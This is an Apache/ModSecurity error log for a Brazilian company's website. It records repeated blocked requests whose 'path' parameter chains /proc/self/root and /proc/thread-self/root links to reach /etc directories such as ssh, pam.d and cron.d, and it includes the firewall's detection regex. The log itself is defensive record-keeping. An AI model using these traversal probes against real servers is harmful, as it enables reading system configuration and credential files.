[Thu Mar 19 00:19:11.862901 2026] [:error] [pid 15051:tid 140411741927168] [client 74.7.241.31:49280] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abtrLymAPhZkrhU8w4mybgAAAIA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 00:19:14.072421 2026] [:error] [pid 30077:tid 140411616036608] [client 74.7.241.31:49284] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abtrMvu8EFLIOrSqIptGuwAAAk8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 00:19:16.269935 2026] [:error] [pid 14269:tid 140411716749056] [client 74.7.241.31:49286] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abtrNAbLMZ6AikZjR9UHlgAAAAM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 00:19:17.817294 2026] [:error] [pid 30077:tid 140411548894976] [client 74.7.241.31:53332] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abtrNfu8EFLIOrSqIptGvQAAAlc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 00:19:22.380374 2026] [:error] [pid 26799:tid 140411666392832] [client 74.7.241.31:53334] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abtrOta6ubjKNq_cu4bjTgAAA0k"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 00:19:25.801355 2026] [:error] [pid 31803:tid 140411641214720] [client 74.7.241.31:53350] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abtrPeyqAr6etmhZHNoQGgAAAEw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 00:19:27.124798 2026] [proxy_fcgi:error] [pid 15826:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:48568] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:19:29.558272 2026] [:error] [pid 30077:tid 140411725141760] [client 74.7.241.31:34102] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abtrQfu8EFLIOrSqIptGxQAAAkI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 00:19:33.145320 2026] [:error] [pid 31803:tid 140411574073088] [client 74.7.241.31:34112] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abtrReyqAr6etmhZHNoQHQAAAFQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 00:19:39.547668 2026] [:error] [pid 17653:tid 140411624429312] [client 74.7.241.31:34124] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abtrS8df6f5d65gmYZQdLwAAAs4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 00:19:42.125664 2026] [:error] [pid 15051:tid 140411674785536] [client 74.7.241.31:33322] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abtrTimAPhZkrhU8w4myfgAAAIg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 00:19:44.203851 2026] [:error] [pid 17653:tid 140411674785536] [client 74.7.241.31:33338] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abtrUMdf6f5d65gmYZQdMgAAAsg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 00:19:47.034709 2026] [:error] [pid 15051:tid 140411699963648] [client 74.7.241.31:33340] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abtrUymAPhZkrhU8w4myiAAAAIU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 00:19:49.132033 2026] [proxy_fcgi:error] [pid 15051:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:49162] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:19:50.386017 2026] [:error] [pid 14269:tid 140411557287680] [client 74.7.241.31:51924] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abtrVgbLMZ6AikZjR9UHrgAAABY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 00:19:53.239586 2026] [:error] [pid 31803:tid 140411741927168] [client 74.7.241.31:51940] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abtrWeyqAr6etmhZHNoQJgAAAEA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 00:19:56.363076 2026] [:error] [pid 26799:tid 140411733534464] [client 74.7.241.31:51952] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abtrXNa6ubjKNq_cu4bjVgAAA0E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 00:19:58.217094 2026] [:error] [pid 15826:tid 140411641214720] [client 74.7.243.128:45906] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abtrXuoXxyEfFpUF8f-9oAAAAUw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 00:20:02.518432 2026] [:error] [pid 17887:tid 140411708356352] [client 74.7.241.31:58440] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abtrYgkwaGbbGflqUZBbkgAAAMQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 00:20:04.955858 2026] [:error] [pid 14269:tid 140411658000128] [client 74.7.241.31:58454] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abtrZAbLMZ6AikZjR9UHvgAAAAo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 00:20:11.133768 2026] [proxy_fcgi:error] [pid 30077:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:49772] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:20:11.351858 2026] [access_compat:error] [pid 14269:tid 140411716749056] [client 216.73.216.191:52190] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/goods.php
[Thu Mar 19 00:20:11.564501 2026] [:error] [pid 15051:tid 140411699963648] [client 74.7.241.31:36180] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abtraymAPhZkrhU8w4mylgAAAIU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 00:20:15.381469 2026] [:error] [pid 17653:tid 140411708356352] [client 74.7.243.128:44406] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abtrb8df6f5d65gmYZQdRQAAAsQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 00:20:24.098980 2026] [core:alert] [pid 27293:tid 140411557287680] [client 57.141.18.43:52488] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 00:20:34.129928 2026] [proxy_fcgi:error] [pid 31803:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:50376] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:20:36.069819 2026] [mime_magic:error] [pid 17653:tid 140411574073088] (70014)End of file found: [client 57.141.18.73:52644] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
